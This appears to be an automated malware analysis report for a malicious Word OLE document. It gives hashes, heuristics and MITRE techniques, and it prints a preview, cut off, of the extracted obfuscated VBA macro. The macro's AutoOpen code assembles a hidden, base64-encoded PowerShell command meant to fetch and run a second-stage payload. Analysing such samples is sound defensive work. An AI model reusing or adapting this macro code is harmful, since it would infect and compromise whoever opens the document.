Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cd8b4ce09ae1cb0…

MALICIOUS

Office (OLE)

Size: 108.2 KB
Created: 2018-05-23 22:06:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 5911a9005d07ee191901a7daba719f4b
SHA-1: 3f856ded058e506adef9c064e6e3102ac0e2f7f0
SHA-256: 8cd8b4ce09ae1cb044e3a07e77ff783af2829e2c5a6bf6c4f7bf2a946ce3f223
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, a common technique for malicious Office documents. The macro uses the Shell() function to execute a PowerShell command. The command is obfuscated through string concatenation but reconstructs to 'powershell -WinDowStyle hidden -e IABp', indicating that it is designed to download and execute a second-stage payload. The large slack space in the OLE structure is also a common indicator of packed or obfuscated malicious content.

Heuristics (6)

  • VBA macros detected (severity: medium; id: OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; id: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high; id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • OLE document has large unaccounted-for region (severity: high; id: OLE_SLACK_ANOMALY)
    OLE file is 110,848 bytes but its declared streams total only 36,022 bytes — 74,826 bytes (68%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (severity: medium; id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   15320 bytes
SHA-256: 667ca68f80c1c2b661d36eb5634905ef4026518fe154721e4724e4cb89c332ec

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "QlzKpimi"
Function FqNfhziY()
On Error Resume Next
wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi)
WtWTrD = 75141
OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp"
iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs)
UmZEi = 36259
JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA"
HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW)
dvaDS = 34516
ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7"
SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj)
zcjSkt = 2243
bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH"
WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd)
GrkzMw = 61485
SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf"
ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro)
HBbid = 85167
QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ"
zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC)
ZharpE = 36921
iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A"
FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc
End Function
Function PFDVqbAoP()
On Error Resume Next
VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp)
JSUao = 66889
zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB"
AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw)
QinsC = 32876
OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9"
lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK)
Cdsjp = 66608
WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA"
jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu)
iKwHf = 55985
QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH"
tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW)
UObPt = 41972
VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs"
hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn)
wzClDY = 68863
otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIAfQB7" + "ADcANgB9A" + "HsAMgB9"
URBbCh = DkZzmr - Cos(dOqwo) * 1 - Chr(89635) / 11834 - ChrB(bdfwh)
RAsww = 46464
QOwDIlGqz = "AHsAOQAyAH" + "0AewA5AH" + "0AewAwAH0AewAyA" + "DcAfQB" + "7ADQAOAB9AHsAN"
PFDVqbAoP = zEcKw + OVJakqMv + WsAfvzP + QRBpdz + VJrFBkt + otWfPXMzZj + QOwDIlGqz
End Function
Function ZbKinzvB()
On Error Resume Next
UdEQMH = kaWBk - Cos(VovGk) * 1 - Chr(79227) / 86794 - ChrB(qYwFA)
mjjwn = 36989
RtmlSRApm = "QAzAH0AewA2" + "AH0AewAx" + "ADUAfQB7ADgAMQB" + "9AHsAMwB9AHsA" + "NAA2AH0Aew"
Ikmjcn = jAGiMK - Cos(dFmOJ) * 1 - Chr(59669) / 59208 - ChrB(FIKLoc)
uYNQf = 25324
aqCjlKzur = "A1ADAAfQB7" + "ADUANgB9AHsAMwA" + "yAH0AewA5" + "ADUAfQB7ADkA" + "OQB9AHsANwA"
IaIBC = qRRtp - Cos(Jiuki) * 1 - Chr(77319) / 24622 - ChrB(fiVQwN)
FiQvfp = 48693
FsYAi = "1AH0AewAxADc" + "AfQB7A" + "DgANw" + "B9AHsANAAzAH0Ae" + "wA2ADgAfQ" + "B7ADgAMwB9AHsAM"
LFHcIo = qRWYTW - Cos(ojcSj) * 1 - Chr(47330) / 59158 - ChrB(sDoqk)
BzKakh = 66493
BkzFRWSo = "QAxADEAfQB7ADE" + "AMAA1A" + "H0AewA0ADcAfQB7" + "ADIAMAB9AHsANgA" + "zAH0AewAz" + "ADcAf" + "QB7ADEAMQAwA" + "H0AewA5AD"
ZbKinzvB = RtmlSRApm + aqCjlKzur + FsYAi + BkzFRWSo
End Function
Function HpRniEwwPQ()
On Error Resume Next
WLEprn = uZuJF - Cos(hTNGAR) * 1 - Chr(13817) / 25121 - ChrB(nRDEp)
LwjoR = 18211
zwijZsALHB = "AAfQB7AD
... (truncated)